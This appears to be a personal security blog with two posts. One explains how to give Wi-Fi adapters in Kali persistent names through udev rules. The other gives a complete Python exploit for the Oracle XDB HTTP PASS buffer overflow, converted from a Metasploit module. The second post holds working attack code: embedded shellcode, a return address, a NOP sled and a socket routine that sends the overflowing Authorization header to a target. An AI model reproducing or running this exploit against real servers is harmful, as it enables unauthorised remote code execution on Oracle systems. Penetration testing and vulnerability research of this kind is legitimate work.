Thursday, April 21, 2016

Configure Static Wifi Card Interface Names in Kali

I've always hated having to correlate the mac address of wlanX with whats printed on the sticker of the device (if it is at all) to find out which adapter is which in kali. Turns out you can can create static entries that tie to the MAC address of the adapter. Below are the steps:

  1. Plug in your device, make sure it shows up in kali with ifconfig/iwconfig (probably as wlan1...)
  2. Note the MAC address of the alfa card (or w/e card you have)
  3. open /etc/udev/rules.d/70-persistent-net.rules and look for the entry corresponding to the MAC you noted. It should look something like this:
    • # USB device 0x:0x (rt2800usb)
    • SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="00:c0:ca:87:5b:27", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNEL=="wlan*", NAME="wlan1"
  4. change "wlan1" to "alfa1" or whatever naming scheme you want, save the file
  5. unplug, replug
  6. dmesg should say:
    • [ 1341.218253] systemd-udevd[2381]: renamed network interface wlan0 to alfa1
  7. repeat with your next wifi adapter
That's it. You're basically just editing it's udev entry to have a different name. This persisted past several reboots and recognizes multiple different cards plugged in at once. You can use these new names exactly the same way as the old ones:

# iwconfig alfa1
alfa1     IEEE 802.11abgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

I took a label maker I had laying around and printed out "alfa1, alfa2, tpl1, etc" and stuck them to the adapters themselves. Now I can find which adapter I need just by glancing at the spaghetti mess of wires and adapters.

Tuesday, April 5, 2016

Oracle XDB HTTP PASS Buffer Overflow in Python

I had to convert the msf module https://www.exploit-db.com/exploits/16809/ to python for a project so here it is:


#!/usr/bin/env python
#converted from https://www.exploit-db.com/exploits/16809/
#@atucom
import socket
import base64
rhost = '192.168.1.10'
rport = 8080
target = (rhost,rport)
#ret = "60616d46"
ret = "\x46\x6d\x61\x60" #Universal ret

#use msfvenom to change to your own payload
buf = "\xb8\xad\x82\x42\xbe\xdb\xcb\xd9\x74\x24\xf4\x5d\x29\xc9" +\
      "\xb1\x47\x83\xc5\x04\x31\x45\x0f\x03\x45\xa2\x60\xb7\x42" +\
      "\x54\xe6\x38\xbb\xa4\x87\xb1\x5e\x95\x87\xa6\x2b\x85\x37" +\
      "\xac\x7e\x29\xb3\xe0\x6a\xba\xb1\x2c\x9c\x0b\x7f\x0b\x93" +\
      "\x8c\x2c\x6f\xb2\x0e\x2f\xbc\x14\x2f\xe0\xb1\x55\x68\x1d" +\
      "\x3b\x07\x21\x69\xee\xb8\x46\x27\x33\x32\x14\xa9\x33\xa7" +\
      "\xec\xc8\x12\x76\x67\x93\xb4\x78\xa4\xaf\xfc\x62\xa9\x8a" +\
      "\xb7\x19\x19\x60\x46\xc8\x50\x89\xe5\x35\x5d\x78\xf7\x72" +\
      "\x59\x63\x82\x8a\x9a\x1e\x95\x48\xe1\xc4\x10\x4b\x41\x8e" +\
      "\x83\xb7\x70\x43\x55\x33\x7e\x28\x11\x1b\x62\xaf\xf6\x17" +\
      "\x9e\x24\xf9\xf7\x17\x7e\xde\xd3\x7c\x24\x7f\x45\xd8\x8b" +\
      "\x80\x95\x83\x74\x25\xdd\x29\x60\x54\xbc\x25\x45\x55\x3f" +\
      "\xb5\xc1\xee\x4c\x87\x4e\x45\xdb\xab\x07\x43\x1c\xcc\x3d" +\
      "\x33\xb2\x33\xbe\x44\x9a\xf7\xea\x14\xb4\xde\x92\xfe\x44" +\
      "\xdf\x46\x50\x15\x4f\x39\x11\xc5\x2f\xe9\xf9\x0f\xa0\xd6" +\
      "\x1a\x30\x6b\x7f\xb0\xca\xfb\x40\xed\xfd\xad\x28\xec\xfd" +\
      "\x40\x68\x79\x1b\x08\x7a\x2c\xb3\xa4\xe3\x75\x4f\x55\xeb" +\
      "\xa3\x35\x55\x67\x40\xc9\x1b\x80\x2d\xd9\xcb\x60\x78\x83" +\
      "\x5d\x7e\x56\xae\x61\xea\x5d\x79\x36\x82\x5f\x5c\x70\x0d" +\
      "\x9f\x8b\x0b\x84\x35\x74\x63\xe9\xd9\x74\x73\xbf\xb3\x74" +\
      "\x1b\x67\xe0\x26\x3e\x68\x3d\x5b\x93\xfd\xbe\x0a\x40\x55" +\
      "\xd7\xb0\xbf\x91\x78\x4a\xea\x23\x44\x9d\xd2\x51\xa4\x1d"

sploit1 = "A" * 4 + ":" + "A" * 442 + "\xeb\x64" + "\x90\x90" + ret + "\x90" *266 + "\xeb\x10" + "\x90" * 109 + buf
req  = "Authorization: Basic "+ base64.b64encode(sploit1) +"\r\n\r\n"
res  = "GET / HTTP/1.1\r\n" + "Host: " +rhost+":"+str(rport)+"\r\n" + req
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
s.send(res)